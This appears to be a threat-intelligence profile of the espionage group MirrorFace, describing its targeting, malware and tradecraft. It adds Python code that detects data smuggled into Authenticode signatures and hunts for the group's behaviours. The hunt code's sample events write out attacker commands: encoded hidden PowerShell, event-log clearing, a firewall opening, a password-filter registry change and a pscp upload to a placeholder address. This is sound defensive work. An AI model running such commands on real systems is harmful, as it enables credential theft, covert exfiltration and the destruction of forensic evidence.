MirrorFace
MirrorFace, also tracked as Earth Kasha, is a China-aligned cyberespionage actor active since at least 2019. Its activity was long attributed to APT10, and ESET now assesses MirrorFace to be a subgroup operating under the APT10 umbrella. Targeting has been almost exclusively Japanese: media organizations, defense-related companies, think tanks, political entities, academic institutes, and research institutes, together with entities outside Japan that have relationships with Japan. ESET also reported a 2024 intrusion against a Central European diplomatic institute connected to Expo 2025 in Osaka (Operation AkaiRyū), assessed as the first known MirrorFace targeting of a European entity.
Initial access
MirrorFace relies heavily on spearphishing and tailored social engineering. Reported lures include emails purporting to come from the PR department of a Japanese political party, mail sent from compromised accounts and Gmail, payloads hosted on OneDrive, and malicious Word documents or remote Word templates carrying VBA code. In Operation AkaiRyū the lure was a OneDrive-hosted ZIP containing a disguised LNK file; opening it launched cmd.exe and then PowerShell to drop further files, including a malicious Word template. MirrorFace has also exploited vulnerabilities in Fortigate and Array AG devices for initial access, and HiddenFace was discovered in an intrusion in which the attackers exploited a FortiOS or FortiProxy vulnerability.
Tooling
Custom malware attributed to the actor includes LODEINFO, HiddenFace (also called NOOPDOOR), ANEL (also known as UPPERCUT), MRSAStealer/MSRAStealer, and a heavily customized AsyncRAT variant. HiddenFace is a backdoor developed and used exclusively by MirrorFace and is more complex and versatile than LODEINFO. Public and dual-use tooling includes PuTTY (including its pscp file-transfer client), Cobalt Strike, FRP, Rubeus, GOST, Visual Studio Code remote tunnels, MSBuild, WMI, rar.exe, Makecab, and native Windows utilities.
Execution and post-compromise behavior
MirrorFace uses cmd.exe for malware execution, file discovery, and manual file manipulation; PowerShell to drop additional files; MSBuild and WMI to execute tooling; and DLL sideloading with legitimate executables, including abuse of a signed McAfee executable during Operation AkaiRyū.
Credential access and collection
The actor gathers data and files of interest from victim systems and stages them on a single victim machine; exports stored emails; exports Chrome web data including contacts, keywords, autofill data, and stored credit-card information; and uses MRSAStealer/MSRAStealer as a password filter DLL so that credentials are captured whenever a user changes a password. HiddenFace-related reporting also links MirrorFace to credential theft via MSRAStealer and exfiltration of its encrypted credential store.
Discovery and lateral movement
Discovery relies on Ping for system discovery, nltest.exe /domain_trusts to map domain trust relationships, native Windows tools to obtain domain user information, and file and directory enumeration targeting documents with extensions such as .doc, .ppt, .xls, .jtd, .eml, .xps, and .pdf.
Staging and exfiltration
Collected files are archived with rar.exe or Makecab before exfiltration, which has been carried out over SCP using the PuTTY Secure Copy client (pscp), over SFTP, and over RDP sessions.
Defense evasion and anti-forensics
Observed evasion includes disabling Windows Defender, modifying the Windows host firewall to allow communication over specific ports, deleting Windows event logs, removing malware directories, archives, delivered tools, and other files from compromised hosts, and using Base64-encoded shellcode in infection chains. MirrorFace has also abused a known weakness in Microsoft's digital-signature verification to append encrypted data to a legitimate binary's signature without invalidating it.
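The signature abuse noted above leaves an artifact that can be checked offline. Authenticode hashes the image but not the WIN_CERTIFICATE entry that carries the PKCS#7 SignedData, so bytes appended inside that entry after the DER structure ends do not disturb validation; this is the padding weakness behind MS13-098 (CVE-2013-3900), which Windows enforces only when the opt-in EnableCertPaddingCheck registry value is set. The checker below is an added example, not code from this page or from ESET: it locates the security directory itself, measures the DER SignedData, and reports anything in the slack after it. FAKE_SIGNED_DATA and build_test_pe are constructed test scaffolding, not a real signature or binary.

```python
"""Find data smuggled into a PE's Authenticode signature entry.  Added
example, not code from the page or from ESET: a minimal parser for the
security directory plus a builder for a constructed test PE."""
import struct

IMAGE_DIRECTORY_ENTRY_SECURITY = 4
WIN_CERT_HEADER = struct.Struct("<IHH")        # dwLength, wRevision, wCertificateType
WIN_CERT_TYPE_PKCS_SIGNED_DATA = 0x0002


def security_directory(pe: bytes) -> tuple[int, int]:
    """(file offset, size) of the attribute certificate table, or (0, 0)."""
    if pe[:2] != b"MZ":
        raise ValueError("no MZ header")
    e_lfanew = struct.unpack_from("<I", pe, 0x3C)[0]
    if pe[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("no PE signature")
    opt = e_lfanew + 4 + 20                     # skip signature and COFF header
    magic = struct.unpack_from("<H", pe, opt)[0]
    if magic == 0x10B:                          # PE32
        n_dirs_off, dirs_off = opt + 92, opt + 96
    elif magic == 0x20B:                        # PE32+
        n_dirs_off, dirs_off = opt + 108, opt + 112
    else:
        raise ValueError(f"unknown optional header magic {magic:#x}")
    if struct.unpack_from("<I", pe, n_dirs_off)[0] <= IMAGE_DIRECTORY_ENTRY_SECURITY:
        return 0, 0
    # Unlike the other directories, this entry holds a raw file offset, not an RVA.
    return struct.unpack_from("<II", pe, dirs_off + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY)


def der_length(blob: bytes) -> int:
    """Encoded size (tag + length + content) of the outer DER SEQUENCE."""
    if not blob or blob[0] != 0x30:
        raise ValueError("SignedData must begin with a SEQUENCE tag")
    first = blob[1]
    if first < 0x80:                            # short-form length
        return 2 + first
    n = first & 0x7F                            # long form: n length bytes follow
    if n == 0 or n > 4:
        raise ValueError("unsupported DER length encoding")
    return 2 + n + int.from_bytes(blob[2:2 + n], "big")


def trailing_bytes(pe: bytes) -> bytes:
    """Everything inside WIN_CERTIFICATE after the DER SignedData ends.
    Authenticode never hashes this region, so it is free space for an attacker."""
    off, size = security_directory(pe)
    if size == 0:
        return b""
    dw_len, _rev, ctype = WIN_CERT_HEADER.unpack_from(pe, off)
    if ctype != WIN_CERT_TYPE_PKCS_SIGNED_DATA:
        raise ValueError(f"unexpected certificate type {ctype:#x}")
    cert = pe[off + WIN_CERT_HEADER.size: off + dw_len]
    return cert[der_length(cert):]


def appended_data(pe: bytes) -> bytes:
    """Trailing bytes with the legitimate zero padding (dwLength is 8-byte aligned) stripped."""
    return trailing_bytes(pe).rstrip(b"\0")


def has_appended_payload(pe: bytes) -> bool:
    """More than alignment padding, or any non-zero byte, means smuggled data."""
    tail = trailing_bytes(pe)
    return len(tail) >= 8 or tail.rstrip(b"\0") != b""


# Constructed stand-in for a PKCS#7 SignedData blob: one outer SEQUENCE with a
# long-form length and 20 bytes of filler.  Not a real signature.
FAKE_SIGNED_DATA = b"\x30\x82\x00\x14" + bytes(range(20))


def build_test_pe(signed_data: bytes, extra: bytes = b"") -> bytes:
    """Minimal, non-runnable PE32+ whose security directory points at a
    WIN_CERTIFICATE holding signed_data followed by extra (then zero padding)."""
    dos = bytearray(b"MZ" + b"\0" * 62)
    struct.pack_into("<I", dos, 0x3C, len(dos))                  # e_lfanew
    opt = bytearray(240)
    struct.pack_into("<H", opt, 0, 0x20B)                        # PE32+ magic
    struct.pack_into("<I", opt, 108, 16)                         # NumberOfRvaAndSizes
    coff = struct.pack("<HHIIIHH", 0x8664, 0, 0, 0, 0, len(opt), 0x22)
    cert_off = len(dos) + 4 + len(coff) + len(opt)
    payload = signed_data + extra
    payload += b"\0" * (-len(payload) % 8)                       # align dwLength to 8
    dw_len = WIN_CERT_HEADER.size + len(payload)
    struct.pack_into("<II", opt, 112 + 8 * IMAGE_DIRECTORY_ENTRY_SECURITY, cert_off, dw_len)
    cert = WIN_CERT_HEADER.pack(dw_len, 0x0200, WIN_CERT_TYPE_PKCS_SIGNED_DATA) + payload
    return bytes(dos + b"PE\0\0" + coff + opt + cert)


if __name__ == "__main__":
    import sys
    if len(sys.argv) > 1:                                        # check a real file
        data = open(sys.argv[1], "rb").read()
        print(f"{sys.argv[1]}: appended={has_appended_payload(data)} tail={len(trailing_bytes(data))} bytes")
    else:
        clean = build_test_pe(FAKE_SIGNED_DATA)
        dirty = build_test_pe(FAKE_SIGNED_DATA, b"ENCRYPTED-PAYLOAD")
        print("clean:", has_appended_payload(clean), "dirty:", has_appended_payload(dirty), appended_data(dirty))
```

Run it with a path to check a real file; a non-zero tail is the condition to alert on, since legitimate alignment padding is at most seven zero bytes. Some legitimate installers have historically used the same slack for download tagging, so treat a hit as a lead to pivot on (extract the tail, check entropy, look for the loader that reads it) rather than a verdict.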
Masquerading
Payloads have been disguised as PEM files, and LNK files and self-extracting archives have been disguised as Word documents.
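The behaviors catalogued above map cleanly onto host telemetry, and the rule set below turns them into hunt logic. It is an added example, not tooling from this page, ESET, or any other vendor: a small Python rule engine run over constructed Sysmon-style process-creation and registry events. The Event class, rule names, paths, command lines and the 198.51.100.10 address are this example's own inventions; the ATT&CK technique IDs attached to each rule are the standard ones for those behaviors.

```python
"""Hunt rules for the MirrorFace tradecraft described above, evaluated over
Sysmon-style process-creation and registry-set events.  Added example; the
Event fields, rule names and sample events are this example's own."""
import ntpath
from dataclasses import dataclass
from typing import Callable


@dataclass
class Event:
    kind: str                 # "process" (Sysmon EID 1) or "registry" (Sysmon EID 13)
    image: str = ""           # process image path
    parent_image: str = ""    # parent process image path
    command_line: str = ""    # full command line
    target_object: str = ""   # registry path (registry events only)
    details: str = ""         # new registry value, as Sysmon renders it


def base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return ntpath.basename(path).lower()


def cmdline(ev: Event) -> str:
    # Pad with spaces so token matches like " cl " work at both ends.
    return " " + ev.command_line.lower() + " "


def is_powershell(ev: Event) -> bool:
    return ev.kind == "process" and base(ev.image) in ("powershell.exe", "pwsh.exe")


def is_proc(ev: Event, *names: str) -> bool:
    return ev.kind == "process" and base(ev.image) in names


# (rule name, ATT&CK technique, predicate).  Predicates are deliberately narrow
# heuristics; rar.exe/makecab and pscp.exe need allow-listing where admins use them.
RULES: list[tuple[str, str, Callable[[Event], bool]]] = [
    ("lnk_to_cmd_to_powershell", "T1059.001",          # LNK -> cmd.exe -> encoded PowerShell
     lambda e: is_powershell(e) and base(e.parent_image) == "cmd.exe"
               and ("-enc" in cmdline(e) or "frombase64string" in cmdline(e))),
    ("domain_trust_discovery", "T1482",
     lambda e: is_proc(e, "nltest.exe") and "/domain_trusts" in cmdline(e)),
    ("archive_staging", "T1560.001",
     lambda e: is_proc(e, "rar.exe", "makecab.exe")),
    ("putty_transfer", "T1048",                        # pscp/psftp exfiltration
     lambda e: is_proc(e, "pscp.exe", "psftp.exe")),
    ("event_log_cleared", "T1070.001",
     lambda e: (is_proc(e, "wevtutil.exe") and (" cl " in cmdline(e) or " clear-log " in cmdline(e)))
               or (is_powershell(e) and "clear-eventlog" in cmdline(e))),
    ("firewall_rule_added", "T1562.004",
     lambda e: is_proc(e, "netsh.exe") and "advfirewall" in cmdline(e) and "add rule" in cmdline(e)),
    ("defender_disabled", "T1562.001",
     lambda e: (is_powershell(e) and "set-mppreference" in cmdline(e)
                and "disablerealtimemonitoring" in cmdline(e))
               or (e.kind == "registry" and "windows defender" in e.target_object.lower()
                   and e.target_object.lower().endswith("disableantispyware")
                   and "0x00000001" in e.details)),
    ("password_filter_dll", "T1556.002",               # LSA Notification Packages changed
     lambda e: e.kind == "registry"
               and e.target_object.lower().endswith(r"\control\lsa\notification packages")),
    ("msbuild_inline_task", "T1127.001",               # MSBuild fed a project from a user-writable path
     lambda e: is_proc(e, "msbuild.exe")
               and any(p in cmdline(e) for p in ("\\users\\", "\\programdata\\", "\\temp\\"))),
    ("wmi_process_create", "T1047",
     lambda e: is_proc(e, "wmic.exe") and "process call create" in cmdline(e)),
]


def scan(events: list[Event]) -> list[tuple[int, str, str]]:
    """Return (event index, rule name, technique) for every rule each event trips."""
    return [(i, name, tid) for i, ev in enumerate(events)
            for name, tid, pred in RULES if pred(ev)]


# Constructed sample telemetry (not real events); 198.51.100.10 is a documentation address.
CMD = r"C:\Windows\System32\cmd.exe"
PS = r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"
SAMPLE_EVENTS = [
    Event("process", PS, CMD, "powershell.exe -nop -w hidden -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQA"),
    Event("process", r"C:\Windows\System32\nltest.exe", CMD, "nltest.exe /domain_trusts"),
    Event("process", r"C:\Users\Public\rar.exe", CMD, r"rar.exe a -r -hpS3cret C:\Users\Public\d.rar D:\Share\*.jtd"),
    Event("process", r"C:\Users\Public\pscp.exe", CMD, r"pscp.exe -P 443 C:\Users\Public\d.rar u@198.51.100.10:/up/"),
    Event("process", r"C:\Windows\System32\wevtutil.exe", CMD, "wevtutil cl Security"),
    Event("process", r"C:\Windows\System32\netsh.exe", CMD,
          'netsh advfirewall firewall add rule name="Update" dir=in action=allow protocol=TCP localport=3389'),
    Event("registry", r"C:\Windows\regedit.exe",
          target_object=r"HKLM\System\CurrentControlSet\Control\Lsa\Notification Packages",
          details="scecli msra"),
    Event("process", PS, r"C:\Windows\explorer.exe", "powershell.exe Get-Process"),   # benign control
]

if __name__ == "__main__":
    for idx, name, tid in scan(SAMPLE_EVENTS):
        ev = SAMPLE_EVENTS[idx]
        print(f"[{tid}] {name}: {ev.command_line or ev.target_object}")
```

The rules are intentionally narrow. The archive and PuTTY rules are the noisy ones where administrators use rar.exe or pscp.exe legitimately; scope them to user-writable paths or require both to fire on the same host within a short window, which is the staging-then-exfiltration sequence the profile describes.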
Targeting
Who and where the actor targets, and (when attributed) the state behind the operation, drawn from open-source reporting and Mallory's analyst review.
Who they target
Sectors the actor has been observed targeting.
- Government & Administration
Where they target
Geographies tied to known operations.
- 🇯🇵 Japan
Tradecraft
77 distinct techniques observed across reporting, grouped by MITRE ATT&CK tactic.
Associated malware families
12 malware families attributed to this actor across reporting.
Associated vulnerabilities
1 CVE this actor has used in observed campaigns, and it has been exploited in the wild.
Observables
7 indicators attributed to this actor: domains, IPs, hashes, and other artifacts pulled from reporting.
Recent activity
20 sources tracked across advisories, community write-ups, and news.
- Listed as an associated threat actor in the detection annotation for exploitation of the public-facing PTC Windchill vulnerability CVE-2026-4681.
- Listed as a threat actor associated with a PowerShell execution detection.
- Conducting spearphishing-led intrusion and espionage activity, including credential theft, malware deployment, data collection, staging, and exfiltration. The group uses custom malware and public tools, has exploited Fortigate and Array AG devices for initial access, and employed multiple post-compromise discovery, credential-dumping, defense-evasion, and lateral-movement techniques during Operation AkaiRyū.
- Listed as a threat actor associated with a malicious file execution analytic.